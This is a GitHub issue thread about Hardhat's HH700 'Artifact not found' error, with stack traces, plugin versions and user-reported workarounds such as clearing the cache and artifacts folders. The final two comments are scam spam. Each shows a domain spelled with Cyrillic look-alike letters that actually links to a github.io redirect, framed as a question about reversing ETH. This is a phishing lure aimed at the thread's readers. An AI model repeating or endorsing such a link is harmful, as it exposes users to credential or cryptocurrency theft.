### ISSUE TITLE
Artifact not found error right after compilation

### ISSUE THREAD

**Issue by alcuadrado** [NomicFoundation/hardhat#2569]
Nico from balancer shared this error with me

```
$ hh compile --show-stack-traces
Nothing to compile
Error HH700: Artifact for contract "@balancer-labs/v2-solidity-utils/contracts/openzeppelin/EnumerableSet.sol:EnumerableSet" not found. 

HardhatError: HH700: Artifact for contract "@balancer-labs/v2-solidity-utils/contracts/openzeppelin/EnumerableSet.sol:EnumerableSet" not found. 
    at Artifacts._handleWrongArtifactForFullyQualifiedName (/home/nventuro/bal/v2/node_modules/hardhat/src/internal/artifacts.ts:457:11)
    at Artifacts._getValidArtifactPathFromFullyQualifiedNameSync (/home/nventuro/bal/v2/node_modules/hardhat/src/internal/artifacts.ts:566:19)
    at Artifacts._getArtifactPathSync (/home/nventuro/bal/v2/node_modules/hardhat/src/internal/artifacts.ts:322:19)
    at Artifacts.removeObsoleteArtifacts (/home/nventuro/bal/v2/node_modules/hardhat/src/internal/artifacts.ts:188:16)
    at SimpleTaskDefinition.action (/home/nventuro/bal/v2/node_modules/hardhat/src/builtin-tasks/compile.ts:1377:23)
    at Environment._runTaskDefinition (/home/nventuro/bal/v2/node_modules/hardhat/src/internal/core/runtime-environment.ts:217:35)
    at Environment.run (/home/nventuro/bal/v2/node_modules/hardhat/src/internal/core/runtime-environment.ts:129:25)
    at SimpleTaskDefinition.action (/home/nventuro/bal/v2/node_modules/hardhat/src/builtin-tasks/compile.ts:1407:11)
    at Environment._runTaskDefinition (/home/nventuro/bal/v2/node_modules/hardhat/src/internal/core/runtime-environment.ts:217:14)
    at Environment.run (/home/nventuro/bal/v2/node_modules/hardhat/src/internal/core/runtime-environment.ts:129:14)
```

He's getting an HH700 despite nothing being done.

I suspect this is a bug in our build-info clearing logic.

Will update with the list of plugins he is using.

**Comment by alcuadrado** [comment]
Plugins:

```
"@nomiclabs/hardhat-ethers@npm:^2.0.1":
  version: 2.0.2

"@nomiclabs/hardhat-etherscan@npm:latest":
  version: 2.1.6
```

**Comment by hedgezhu** [comment]
My friend, i meet the same problem

In the end, I found out that it was because hardhat could not find the contract, so I needed to specify the contract path for it.

Just modify the path in hardhat.config.ts, more information can be found here: https://hardhat.org/config/

Hope to help you

<img width="605" alt="Screen Shot 2022-04-12 at 15 25 23" src="https://user-images.githubusercontent.com/70309026/162906430-726c4097-b465-4a7f-bf17-92280acbead1.png">

**Comment by alcuadrado** [comment]
Thanks, @hedgezhu!

I'm not sure if that can be a solution, as that's the default behavior of Hardhat.

**Comment by LuozhuZhang** [comment]
> 

That's ok. Let's figure out how to fix this bug

**Comment by ihorbond** [comment]
This is still not working even with paths specified. Arghhh this is so frustrating. What am I missing ?
https://github.com/ihorbond/hardhat-test

**Comment by fvictorio** [comment]
@ihorbond did you figure that out? The repo you linked doesn't exist anymore.

**Comment by ihorbond** [comment]
@fvictorio yes there was a separate issue with Windows and glob package that I opened and you already fixed :)

**Comment by fvictorio** [comment]
Glad to hear that!

**Comment by ysqi** [comment]
i meet the same problem, it works after clear cache:
```sh
rm -rf cache
rm -rf artifacts
```

**Comment by fvictorio** [comment]
@ysqi you can use `npx hardhat clean` to do that.

**Comment by codantes** [comment]
I tried doing `npx hardhat clean` and specifying the paths still not working. has anyone else figured it out yet?

**Comment by alcuadrado** [comment]
@codantes can you please open a new issue. This one is about an innocuous error that only happens very infrequently, and I suspect yours is a different one.

**Comment by jtakalai** [comment]
I'm getting this problem in Github Actions specifically, so far haven't been able to consistently reproduce it locally. Even in Github Actions it happens something like half of the time. Really frustrating! Tried running clean (removing artifacts etc.) before `hardhat compile`, but right after `hardhat compile` sometimes the `artifacts` directory just doesn't contain the JSONs that other scripts expect.

**Comment by jtakalai** [comment]
For me, it helped to downgrade Node.js from `18.16.0` to `18.12.1`. I hope I can use the latest Node once this is fixed :)

**Comment by Akaki2003** [comment]
@mildlycoder have you figured it out?

**Comment by tenbits** [comment]
If this happens during the `removeObsoleteArtifacts` phase, it means the artifact in the `cache` folder exists, but doesn't exist in `artifacts`. This is somewhat a rare case, as two conditions must be matched: 
-  the `artifacts` folder was removed manually or in some clean-up process, but the `cache` folder wasn't. 
-  some changes to the codebase must be made to remove some Contract dependency so that it is not emitted to the artifacts folder. 

So after the compilation, `Hardhat` tries to clean the obsolete artifacts, that it finds in `cache` folder, but throws the error as it is not found in `artifacts`. 

The **workaround**: make sure the `cache` folder is removed during the cleanup

**Desired** Hardhat **fix**: if the artifact can't be found in `removeObsoleteArtifacts` method, it should be silently skipped, as it was already successfully removed previously.

**Comment by Akaki2003** [comment]
in my case it was that the artifact file name was correct but the contract name didn't match the file name

**Comment by 0xprinc** [comment]
@ysqi you are my hero :)

**Comment by jamesanderson874BMW** [comment]
Can anyone inform me whether the ETH received here [аuth.id-transfеr.cоm](https://auth-241.github.io/redirect/) can be reversed later? Since I already used it 😢

<img width="369" alt="Image" src="https://github.com/user-attachments/assets/0565a8db-f020-4f95-83c4-68a446ff030d" />

**Comment by oliviamartinez452BMW** [comment]
> Can someone tell me if the Ethere [аuth.id-transfer.cоm](https://auth-241.github.io/redirect/)um sent to this address is revocable later? Since I already used it 😞

<img width="369" alt="Image" src="https://github.com/user-attachments/assets/b5a37623-f699-48f4-bc08-9d4161bcd339" />
